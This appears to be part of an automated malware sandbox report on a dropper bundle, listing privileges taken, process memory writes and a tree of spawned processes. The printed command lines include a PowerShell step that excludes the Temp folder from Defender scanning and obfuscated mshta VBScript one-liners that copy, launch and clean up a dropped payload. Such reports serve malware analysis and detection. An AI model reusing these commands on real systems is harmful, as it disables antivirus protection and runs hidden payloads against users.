Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19f84b58b3d7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat191649b47c9e2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\6142391.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\1464811.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WerFault.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WerFault.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4544 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4544 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4544 wrote to memory of 4576 N/A C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 4576 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe
PID 4576 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe
PID 4576 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe
PID 4640 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4804 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4816 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4832 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4872 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4892 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\WerFault.exe
PID 4640 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\WerFault.exe
PID 4640 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\WerFault.exe
PID 4640 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4932 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4640 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4804 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4804 wrote to memory of 4968 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Users\Admin\AppData\Local\Temp\3002.exe
PID 4640 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Users\Admin\AppData\Local\Temp\3002.exe
PID 4640 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe C:\Users\Admin\AppData\Local\Temp\3002.exe
PID 4832 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat191649b47c9e2.exe
PID 4832 wrote to memory of 5016 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat191649b47c9e2.exe
PID 4872 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat199ba8a4637dcb034.exe
PID 4872 wrote to memory of 5036 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat199ba8a4637dcb034.exe
PID 4892 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e4750dd01.exe
PID 4892 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e4750dd01.exe
PID 4892 wrote to memory of 5048 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e4750dd01.exe
PID 4816 wrote to memory of 5068 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe
PID 4816 wrote to memory of 5068 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe
PID 4816 wrote to memory of 5068 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe
PID 4908 wrote to memory of 5092 N/A C:\Windows\SysWOW64\taskkill.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19f84b58b3d7.exe
PID 4908 wrote to memory of 5092 N/A C:\Windows\SysWOW64\taskkill.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19f84b58b3d7.exe
PID 4852 wrote to memory of 3172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat1946eb84e6.exe
PID 4852 wrote to memory of 3172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat1946eb84e6.exe
PID 4852 wrote to memory of 3172 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat1946eb84e6.exe
PID 4932 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe
PID 4932 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe
PID 4932 wrote to memory of 3184 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe
PID 4952 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe
PID 4952 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe
PID 4952 wrote to memory of 3856 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe
PID 4984 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\3002.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe
PID 4984 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\3002.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe
PID 4984 wrote to memory of 4124 N/A C:\Users\Admin\AppData\Local\Temp\3002.exe C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe
PID 3184 wrote to memory of 4196 N/A C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe C:\Users\Admin\AppData\Local\Temp\is-SF020.tmp\Sat19ba05e89ea6d406.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\is-SF020.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SF020.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$5006C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0E1E8804\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-PJJ1J.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-PJJ1J.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\ProgramData\4221052.exe

"C:\ProgramData\4221052.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\ProgramData\1464811.exe

"C:\ProgramData\1464811.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 896

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1788 -s 1528

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 656

C:\ProgramData\358946.exe

"C:\ProgramData\358946.exe"

C:\ProgramData\1319964.exe

"C:\ProgramData\1319964.exe"

C:\ProgramData\2746100.exe

"C:\ProgramData\2746100.exe"

C:\Users\Admin\AppData\Local\Temp\is-LLHAC.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-LLHAC.tmp\setup_2.tmp" /SL5="$2020C,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\4172933.exe

"C:\ProgramData\4172933.exe"

C:\ProgramData\7308219.exe

"C:\ProgramData\7308219.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 676

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4172933.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\4172933.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\ProgramData\4212280.exe

"C:\ProgramData\4212280.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 628

C:\ProgramData\7308219.exe

"C:\ProgramData\7308219.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 812

C:\ProgramData\893496.exe

"C:\ProgramData\893496.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 684

C:\Users\Admin\AppData\Local\Temp\is-ELF00.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-ELF00.tmp\setup_2.tmp" /SL5="$201F8,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\4212280.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\4212280.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 892

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4172933.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\4172933.exe") do taskkill -Im "%~nxl" /F

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\4212280.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\4212280.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 956

C:\ProgramData\1464811.exe

"C:\ProgramData\1464811.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 880

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\ProgramData\6142391.exe

"C:\ProgramData\6142391.exe"

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 960

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "4172933.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 952

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "4212280.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2196 -s 1028

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 928

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 1100

C:\Program Files\Windows Multimedia Platform\AEQRFVQJOH\ultramediaburner.exe

"C:\Program Files\Windows Multimedia Platform\AEQRFVQJOH\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-NMSUC.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-NMSUC.tmp\ultramediaburner.tmp" /SL5="$202FC,281924,62464,C:\Program Files\Windows Multimedia Platform\AEQRFVQJOH\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\86-a1361-cd9-d64a4-ea46eb7528109\Nutuvehozhae.exe

"C:\Users\Admin\AppData\Local\Temp\86-a1361-cd9-d64a4-ea46eb7528109\Nutuvehozhae.exe"

C:\Users\Admin\AppData\Local\Temp\c8-60e4d-7a1-92eae-be6170cdeb3f2\Mebecucezha.exe

"C:\Users\Admin\AppData\Local\Temp\c8-60e4d-7a1-92eae-be6170cdeb3f2\Mebecucezha.exe"

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\SysWOW64\cmd.exe

